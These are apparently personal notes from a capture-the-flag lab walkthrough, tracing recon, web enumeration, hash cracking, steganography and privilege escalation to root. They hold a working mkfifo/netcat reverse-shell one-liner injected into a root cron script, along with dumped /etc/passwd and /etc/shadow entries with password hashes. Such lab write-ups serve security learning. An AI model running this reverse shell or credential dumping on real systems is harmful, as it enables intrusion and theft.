

					recon

web:80
web:65524
ssh:6498

web:80:nginx 1.16.1
web:65524: Apache 2.4.43



					enum - web on 80

/hidden
/hidden/whatever


					enum - web on 65524
/robots.txt

User-Agent:a18672860d0510e5ab6699730763b250




					hashing

a18672860d0510e5ab6699730763b250:flag{1m_s3c0nd_fl4g}




					more enum - 65524

*this boi just out in the open on the default page

flag{9fdafbd64c47471a8f54cd3fc64cd312}


*in the source 

ObsJmP173N2X6dOrAgEAL0Vu


*identified as base62

/n0th1ng3ls3m4tt3r



					More hashing

940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81:mypasswordforthatjob



					
					Steg

sudo wget http://10.10.19.236:65524/n0th1ng3ls3m4tt3r/binarycodepixabay.jpg

*using steghide reveals file
*passphrase:mypasswordforthatjob

secrettext.txt


*convert binary

user:boring
pass:iconvertedmypasswordtobinary


					
					ssh

*i got got, turns out the flag is rot13 encoded



						privesc 


*linpeas

root    cd /var/www/ && sudo bash .mysecretcronjob.sh



*inject code 


rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.2.26.235 4444 >/tmp/f


*set listener and wait a min




						root

cat /root/.root.txt





						shits and gigs



root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:110::/run/uuidd:/usr/sbin/nologin
lightdm:x:106:113:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:107:117::/nonexistent:/bin/false
kernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
pulse:x:109:119:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:110:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
boring:x:1000:1000:Admin CTF,,,:/home/boring:/bin/bash




root:$6$by4frbr1$a9mkoc3i5Nx4.JOYQH3w7FoE.grmLoDkskxcy/pSnl0NaMu7V1bpixgeNRMcoHAGcfa4w83m/hfAb.LGASOIx1:18426:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
man:*:17647:0:99999:7:::
lp:*:17647:0:99999:7:::
mail:*:17647:0:99999:7:::
news:*:17647:0:99999:7:::
uucp:*:17647:0:99999:7:::
proxy:*:17647:0:99999:7:::
www-data:*:17647:0:99999:7:::
backup:*:17647:0:99999:7:::
list:*:17647:0:99999:7:::
irc:*:17647:0:99999:7:::
gnats:*:17647:0:99999:7:::
nobody:*:17647:0:99999:7:::
systemd-network:*:17647:0:99999:7:::
systemd-resolve:*:17647:0:99999:7:::
syslog:*:17647:0:99999:7:::
messagebus:*:17647:0:99999:7:::
_apt:*:17647:0:99999:7:::
uuidd:*:17647:0:99999:7:::
lightdm:*:17647:0:99999:7:::
whoopsie:*:17647:0:99999:7:::
kernoops:*:17647:0:99999:7:::
pulse:*:17647:0:99999:7:::
avahi:*:17647:0:99999:7:::
hplip:*:17647:0:99999:7:::
sshd:*:18426:0:99999:7:::
boring:$6$Qy2rKnIj$GV7v9.PmGHpjQ9jTK4SISrJ2qx0I4egYr5YJ6uiKLV0cF0veIV8gzJfycvyQ7xEcP6yxxCzKR6TtMlf5sTXN..:18428:0:99999:7:::

